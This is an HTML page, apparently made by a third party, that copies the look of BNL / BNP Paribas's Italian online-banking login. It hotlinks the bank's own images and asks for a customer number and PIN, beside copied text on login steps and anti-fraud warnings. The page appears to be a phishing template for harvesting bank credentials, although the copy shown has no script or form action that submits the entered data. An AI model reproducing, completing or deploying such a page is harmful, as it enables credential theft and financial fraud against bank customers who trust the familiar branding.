<!DOCTYPE html>
<html lang="it">
<head>
  <meta charset="UTF-8">
  <title>BNP Paribas - Login</title>
  <link rel="icon" href="https://banking.bnl.it/etc.clientlibs/bnl/clientlibs/clientlib-all/resources/favicon.ico" type="image/x-icon">
 
  <link rel="shortcut icon" href="https://banking.bnl.it/etc.clientlibs/bnl/clientlibs/clientlib-all/resources/favicon.ico" type="image/x-icon">
 <link rel="apple-touch-icon" href="https://banking.bnl.it/etc.clientlibs/bnl/clientlibs/clientlib-all/resources/favicon.ico">

  <style>
    body {
      position: relative;
  font-family: "BNPPSans", Helvetica, sans-serif;
      margin: 0;
      font-family: Arial, Helvetica, sans-serif;
      background-color: #fff;
      color: #000;
    }

    /* HEADER */
    header {
      background: #00965e;
      padding: 8px 40px;
      display: flex;
      justify-content: space-between;
      align-items: center;
      color: #fff;
      font-size: 12px;
      font-family: "BNPPSans", Helvetica, sans-serif;
      letter-spacing:-0.1px;
      transform: scaleY(1.2); 
    }
     .logo img{
        height: 75px;
        margin-left: 30px;
     }
     .DiventaCliente{
        padding: 15px;
        font-size: 18px;
        font-weight: 500;
        align-items: center;
        text-align: right;
        color: #5f5f5f;
        background-color: rgba(0,0,0,0.05);
     }
     .accesso{
      display: block;
      width: 300px;
        margin: 30px 10% -30px 0;
        padding-left: 15%;
        text-align: center;
        font-size: 30px;
        font-weight: 500;
        color: #00663F;
     }
    .menu-left span,
    .menu-right span {
      margin-right: 10px;
      cursor: pointer;
      font-weight: 550;
    }

    .menu-left {
      display: flex;
      align-items: center;
      gap: 18px;
    }

    .menu-left img {
      height: 22px;
      margin-right: 10px;
    }

    .menu-right {
      display: flex;
      align-items: center;
      gap: 25px;
    }

    /* MAIN LAYOUT */
    .container {
      display: flex;
      margin: 40px auto;
      padding: 0 20px;
      max-width: 1000px;
      margin-right: 42%;
      justify-content: space-around;
      gap: 230px;
    }

    /* LOGIN BOX */
    .login-box {
        width: 450px;
        display: flex;
        flex-direction: row;
      border: 1px solid #ddd;
      background: #ECF0F1;
      padding: 20px;
      border-radius: 4px;
      margin-left: 40%;
      border-radius: 5px;
    }
    .bg{
        background-color: white;
        width: 450px;
        display: flex;
    } .bg div{
      margin-left: 20px;
    }
    .home{
      display: inline-block;

      width: 200px;
    margin-left:  350px;
    margin-top: 100px;
    font-size: 12px;
    font-weight: 700;
    text-decoration: underline;
    color: #00663F;
    position: relative;
  }.home::before {
    right: 101%;
      content: "";
      position: absolute;
      top: 50%;
      transform: translateY(-50%);
      width: 0;
      height: 0;
      border-right: 6px solid #00663F; /* → переміщаємо на праву сторону */
border-top: 5px solid transparent;
border-bottom: 5px solid transparent;
border-left: none;
    }
    .login-box h2 {
      font-size: 20px;
      margin-bottom: 20px;
      font-weight: 600;
    }

    .login-box label {
      display: block;
      font-size: 13px;
      margin: 10px 0 5px;
      color: #333;
    }

    .login-box input {
      width: 270px;
      padding: 10px;
      font-size: 14px;
      border: 1px solid rgba(0, 0, 0, 0.1);
      border-radius: 3px;
      margin-bottom: 10px;
    }

    .login-box button {
  background-color: #00663F;
  color: white;
  border: none;
  border-radius: 5px;
  padding: 3px 40px;
  font-size: 14px;
  font-weight: bold;
  cursor: pointer;
  transition: background-color 0.3s ease;
  margin-left: 10px; /* трохи відступ від поля вводу */
  height: 33px;
  margin-top: 24.5%
}
.login-box button:hover {
  background-color: #004d30;
}
    .login-box button:hover {
      background: #006c30;
    }

    .alert {
      background:#ECF0F1 ;
      display: flex;
      margin-left: 40%;
      margin-top: 5px;
border-radius: 5px;
      padding: 10px;
      width: 470px;
      font-size: 16px;
      line-height: 1.5;
      
      
    }
    .alert div{
      width: 350px;
    }
    .alert b{
      color: #00663f;
      font-weight: 600;
      font-size: 15px;
    }

    .alert a {
      color: #00663f;
      font-weight: 600;
      font-size: 15px;
      text-decoration: none;
      text-decoration: underline;
    }

    /* INFO BOX */
    .info-box {
    
    background-color: #ECF0F1;
      font-size: 14px;
      line-height: 1.6;
      width: 350px;
      padding: 20px;
      text-align: left;
      color: rgba(0, 0, 0, 0.6);
    }

    .info-box h3 {
      width: 330px;
      font-family: inherit;
    font-weight: 550;
    line-height: 1.1;
      color: #00663f;
      margin-bottom: 15px;
      font-size: 27px;
      
    }

    .info-box b {
      color: #4d5b5c;
      font-weight: 600;
      font-size: 16px;
    }

    .info-box a {
      display: inline-block;
font-size: 16px;
      color: #00663F;
      font-weight: bold;
      text-decoration: none;
      line-height: 0px;
        }

    .info-box a:hover {
      text-decoration: underline;
    }

    /* FOOTER */
    footer {
       position: relative;
        margin: 10% auto 0 auto;
      background: #f5f5f5;
      padding: 15px 40px 0px;
      text-align: center;
      font-size: 11px;
      color: rgba(0, 0, 0, 0.3);
      border-top: 1px solid #ddd;
      line-height: 1.8;
      display: flex;
    }

    footer a {
      color: #006699;
      margin: 0 5px;
      text-decoration: none;
    }

    footer a:hover {
      text-decoration: underline;
    }
    footer .main-foot{
        display: block;
        text-align: left;
        justify-content: center;
        margin-left: 30%;
    }
    footer img{
        position: absolute;
        bottom: 30px;
        left: 23%;
    }
    .main-foot div{
        text-align: center;
    }
   .main-foot .left{
        text-align: left;
    }
    
    @media (max-width: 990px) {
header{
  display: none;
}
.container{
  flex-direction: column;
  align-items: center;
  margin: 0;

}
.cont-login{
  margin-right: 40%;
margin-top: 5%;
  margin-bottom: -20%;
}
.home{
  margin-top: 44px;
}
.accesso{
  margin-left: 20%;
}
.info-box{
  width: 450px;
}
footer img{
  margin-bottom: 3%;
}
    }
  </style>
</head>
<body>

  <!-- HEADER -->
  <header>
    <div class="menu-left">
      <span>INDIVIDUI E FAMIGLIE</span>
      <span>PRIVATE BANKING</span>
      <span>LIFE BANKER</span>
      <span>FINANCIAL BANKING</span>
      <span>PROFESSIONISTI E IMPRESE</span>
      <span>CORPORATE</span>
      <span>PUBBLICA AMMINISTRAZIONE</span>
    </div>
    <div class="menu-right">
      <span>SCOPRI BNL</span>
      <span>RESPONSABILITÀ SOCIALE</span>
    </div>

    
  </header>
<div class="logo"><img src="https://youreurope.europa.eu/business/finance-funding/getting-funding/access-finance/sites/default/files/styles/oe_theme_medium_no_crop/public/company-logo/bnl_-_banca_nazionale_del_lavoro_gruppo_bnp_paribas_0.png?itok=mOCCCQbD" alt="BNP Paribas"></div>
<div class="DiventaCliente">Diventa Cliente</div>
  <!-- MAIN -->
 <!-- MAIN -->
<!-- MAIN -->
<h2 class="accesso">Accesso area clienti</h2>
<div class="container">
  
  <!-- LOGIN -->
  <div class="cont-login">
    <div class="login-box">
        <div class="bg">
        <div><label for="numero">NUMERO CLIENTE</label>
            <input type="number" id="numero">
                    
            <label for="pin">PIN</label>
            <input type="password" id="pin">
        </div>
      

      <button class="btn">Login</button>
    </div>
    </div>
    
    <div class="alert">
      <img style="height: 78px;" src="https://banking.bnl.it/rsc/contrib/graphicaltheme/bnl-private/img/alert2.png" alt="alert">
      <div>
        <b>Proteggiti da chi si finge la tua banca</b><br>
        Attenzione alle telefonate, email e SMS fraudolenti. 
        <a href="#">Leggi i nostri consigli.</a>
      </div>
    </div>


    <a href="#" class="home">Torna alla Homepage</a>
  </div>

  <!-- INFO -->
  <div class="info-box">
    <h3>MODALITÀ DI ACCESSO: IL PROCESSO DI LOGIN</h3>
    <p>
      Per <b>accedere</b> alla tua Area Clienti devi inserire il tuo Numero Cliente, il tuo PIN e 
      <b>confermare l'accesso tramite una di queste modalità:</b>
    </p>
    <p><b>1)</b> <b>tramite notifica push</b> inviata sul tuo smartphone o tablet dove hai attivato la tua app BNL. <b>Se non ricevi l’anteprima della notifica</b>, accedi all’app e <b>clicca su ALTRO > AUTORIZZAZIONI per visualizzarla.</b></p>
    <p><b>2)</b> <b>tramite QR code:</b> per utilizzarlo apri l’app e clicca su “Scansiona", presente in basso nella pagina di apertura dell'app BNL, inquadra il QR Code che apparirà sullo schermo del PC e inserisci il codice di 8 cifre visualizzato</p>
    <p><b>3)</b> se hai sottoscritto il servizio <b>OTP via SMS</b> inserendo l'OTP ricevuta via SMS.</p>

    <a href="#">Dove trovi il tuo numero Cliente</a><br>
    <a href="#">Dove trovi il PIN</a><br>
    <a href="#">Difenditi dalle truffe e aiutaci a proteggerti</a>
  </div>
</div>


  <!-- FOOTER -->
  <footer>
    <img src="https://banking.bnl.it/rsc/contrib/graphicaltheme/bnl-public/img/footer/trasparenza_BNL-1.jpg" alt="">
    <div class="main-foot">
     <div>DATI SOCIETARI PROSPETTI CONSOB RECLAMI-RICORSI-CONCILIAZIONE WHISTLEBLOWING RICHIESTA DOCUMENTI ARBITRO CONTROVERSIE FINANZIARIE PRIVACY CARTA</div>
     <div class="left">RESPONSABILITÀ DATI PERSONALI NOTE LEGALI CONTATTI ISTITUZIONALI PSD2 DAC6 ACCESSIBILITÀ COOKIE PREFERENZE COOKIE: Tutti attivi</div>
     <div>I contenuti del sito hanno prevalentemente carattere promozionale e finalità pubblicitarie</div>
    </div>
  </footer>

</body>
</html>
